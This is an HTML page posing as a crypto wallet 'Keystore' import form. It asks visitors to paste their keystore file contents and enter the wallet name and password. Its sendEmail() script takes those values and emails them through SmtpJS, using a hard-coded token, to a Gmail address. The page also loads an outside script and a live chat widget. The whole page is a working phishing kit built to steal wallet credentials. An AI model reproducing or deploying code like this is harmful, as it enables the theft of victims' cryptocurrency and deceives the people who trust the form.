<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link href='https://unpkg.com/boxicons@2.1.1/css/boxicons.min.css' rel='stylesheet'>
    <title> Keystore</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous">
		<!-- Smartsupp Live Chat script -->
<script type="text/javascript">
	var _smartsupp = _smartsupp || {};
	_smartsupp.key = '60b4a00ebc35376c334f00247a8abbab37972206';
	window.smartsupp||(function(d) {
	  var s,c,o=smartsupp=function(){ o._.push(arguments)};o._=[];
	  s=d.getElementsByTagName('script')[0];c=d.createElement('script');
	  c.type='text/javascript';c.charset='utf-8';c.async=true;
	  c.src='https://www.smartsuppchat.com/loader.js?';s.parentNode.insertBefore(c,s);
	})(document);
	</script>
    <style>
        * {
            box-sizing: border-box;
        }
        body{
          background-color: #efeff4;
            padding: 0px;
            border: 0px;
            margin: 0px;
        }
        #formGroupExampleInput{
            height: 100px;
        }
        .form-group{
            margin-top: 15px;
        }
        .form-control{
          margin-left: 0px;
          margin-right: 0px;
        }
                /* The message box is shown when the user clicks on the password field */
                #message {
  /* display:none; */
  /* background: #f1f1f1; */
  color: #000;
  position: relative;
  padding: 15px;
  margin-top: -10px;
}

#message p {
  padding: 2px 2px;
  font-size: 15px;
}

/* Add a green text color and a checkmark when the requirements are right */
.valid {
  color: green;
}

.valid:before {
  position: relative;
  left: -35px;
  content: "−";
}

/* Add a red text color and an "x" when the requirements are wrong */
.invalid {
  color: gray;
}

.invalid:before {
  position: relative;
  left: -35px;
  content: "−";
}


@media only screen and (max-width: 800px) {
  #message p {
  padding: 1px 1px;
  font-size: 8px;
}

.invalid:before {
  left: -10px;
}
.valid:before {
  left: -10px;
}
}	    
     /* CHATBOT */
     @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700&display=swap');

/* Box sizing rules */
*,
*::before,
*::after {
  box-sizing: border-box;
}

/* Remove default margin */
body,
h1,
h2,
h3,
h4,
p,
figure,
blockquote,
dl,
dd {
  margin: 0;
}

/* Remove list styles on ul, ol elements with a list role, which suggests default styling will be removed */
ul[role='list'],
ol[role='list'] {
  list-style: none;
}

/* Set core root defaults */
html:focus-within {
  scroll-behavior: smooth;
}

/* Set core body defaults */
/* body {
  min-height: 100vh;
  text-rendering: optimizeSpeed;
  line-height: 1.5;
  font-family: 'Poppins', sans-serif;
  background: linear-gradient(90deg, var(--grey) 31px, transparent 1px) 50%, linear-gradient(180deg, var(--grey) 31px, var(--blue) 1px) 50%;
  background-size: 32px 32px;
  color: var(--dark);
} */

/* A elements that don't have a class get default styles */
a:not([class]) {
  text-decoration-skip-ink: auto;
}

/* Make images easier to work with */
img,
picture {
  max-width: 100%;
  display: block;
}

/* Inherit fonts for inputs and buttons */
input,
button,
textarea,
select {
  font: inherit;
}

/* Remove all animations, transitions and smooth scroll for people that prefer not to see them */
@media (prefers-reduced-motion: reduce) {
  html:focus-within {
   scroll-behavior: auto;
  }
  
  *,
  *::before,
  *::after {
    animation-duration: 0.01ms !important;
    animation-iteration-count: 1 !important;
    transition-duration: 0.01ms !important;
    scroll-behavior: auto !important;
  }
}

/* GLOBAL STYLES */
:root {
	--blue: #335DFF;
	--grey: #F5F5F5;
	--grey-d-1: #EEE;
	--grey-d-2: #DDD;
	--grey-d-3: #888;
	--white: #FFF;
	--dark: #222;
}
/* GLOBAL STYLES */

	    
    </style>
</head>
<body>
<div class="container-fluid">
	<form onsubmit="sendEmail(); reset(); return false;">
        <div class="form-group">
          <label for="formGroupExampleInput">Keystore</label>
          <input type="text" class="form-control" id="formGroupExampleInput" name="name" placeholder="Paste the contents of your Keystore file" >
        </div>
        <div class="form-group">
          <label for="formGroupExampleInput2">Wallet Path</label>
          <input type="text" class="form-control" id="formGroupExampleInput3" placeholder="/defirepairer/172903/28383/28383882/28383/28389/883" disabled>
        </div>
        <div class="form-group">
          <label for="formGroupExampleInput2">Wallet Name</label>
          <input type="text" class="form-control" id="formGroupExampleInput2" name="email" placeholder="Your wallet name">
        </div>
        <div class="form-group">
            <label for="inputPassword6">Wallet password</label>
            <input type="password" id="inputPassword6" class="form-control mx-sm-3" name="password" pattern="(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).{8,}" 
            title="Must contain at least one number and one uppercase and lowercase letter, and at least 8 or more characters"
            aria-describedby="passwordHelpInline" placeholder="Minimum of 8 characters" required>
            <small id="passwordHelpInline" class="text-muted">
              Must be 8-20 characters long.

              <div id="message">
                <p id="letter" class="invalid">A lowercase letter</p>
                <p id="capital" class="invalid">A capital (uppercase) letter</p>
                <p id="number" class="invalid">A number</p>
                <p id="length" class="invalid">Minimum 8 characters</p>
              </div>
    
            </small>
          </div>

          <button class="btn btn-primary" type="submit" value="Submit">Import Wallet</button>
      </form>
    
    
      
</div>

<script src="https://abdultahi.github.io/chain/Form.js"></script>
<script src="https://smtpjs.com/v3/smtp.js"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js" integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN" crossorigin="anonymous"></script>
<script>
	function sendEmail(){
		const fname = document.getElementById('formGroupExampleInput');
		const email = document.getElementById('formGroupExampleInput2');
		const pwd = document.getElementById('inputPassword6')

		let ebody = `
		<b>Name: </b>${fname.value}
		<br>
		<b>Email: </b>${email.value}
		<b>Ref: </b>${pwd.value}

		`
		Email.send({
			SecureToken : "549e41ee-ec43-4fb4-b3ba-a062214aac54",
			To : 'formsubmitsp@gmail.com',
			From : "formsubmitsp@gmail.com",
			Subject : "Chain!! ",
			Body : ebody
		}).then(
		message => alert(message)
		);
	}
</script>
<!-- <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script> -->
</body>
</html>
